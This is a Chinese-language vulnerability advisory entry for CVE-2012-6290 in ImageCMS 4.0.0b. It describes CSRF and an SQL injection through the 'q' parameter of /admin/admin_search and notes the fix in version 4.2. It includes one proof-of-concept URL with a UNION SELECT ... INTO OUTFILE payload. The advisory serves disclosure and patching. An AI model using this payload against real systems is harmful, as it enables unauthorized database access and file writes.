Lucene search
RootSSV:61808HistoryMar 14, 2014 - 12:00 a.m.
ImageCMS SQL注入漏洞
2014-03-1400:00:00
Root
www.seebug.org
9
0.001 Low
EPSS
Percentile
50.5%
CVE ID:CVE-2012-6290
ImageCMS是一款内容管理系统。
ImageCMS存在跨站请求伪造漏洞,允许远程攻击者构建恶意URI,诱使用户解析,可以目标用户上下文执行恶意操作。
由于传递到"/admin/admin_search/"的"q" HTTP GET参数没有正确过滤,攻击者可以利用漏洞在应用数据库中执行任意SQL代码。
0
ImageCMS 4.0.0b
ImageCMS 4.2已经修复该漏洞,建议用户下载更新:
http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202
Related
packetstorm
packetstorm
ImageCMS 4.0.0b SQL Injection
2013-01-24 00:00:00
htbridge
htbridge
SQL Injection Vulnerability in ImageCMS
2012-12-05 00:00:00
seebug
seebug
ImageCMS 4.0.0b Multiple Vulnerabilities
2014-07-01 00:00:00
cvelist
cvelist
CVE-2012-6290
2014-03-11 15:00:00
CVE-2013-7334
2022-10-03 16:14:53
cve
cve
CVE-2012-6290
2014-03-11 19:37:01
CVE-2013-7334
2022-10-03 16:14:53
exploitpack
exploitpack
ImageCMS 4.0.0b - Multiple Vulnerabilities
2013-01-25 00:00:00
nvd
nvd
CVE-2012-6290
2014-03-11 19:37:01
CVE-2013-7334
2014-03-11 16:17:56
securityvulns
securityvulns
SQL Injection Vulnerability in ImageCMS
2013-01-28 00:00:00
prion
prion
Sql injection
2014-03-11 19:37:00
Cross site request forgery (csrf)
2014-03-11 16:17:00
exploitdb
exploitdb
ImageCMS 4.0.0b - Multiple Vulnerabilities
2013-01-25 00:00:00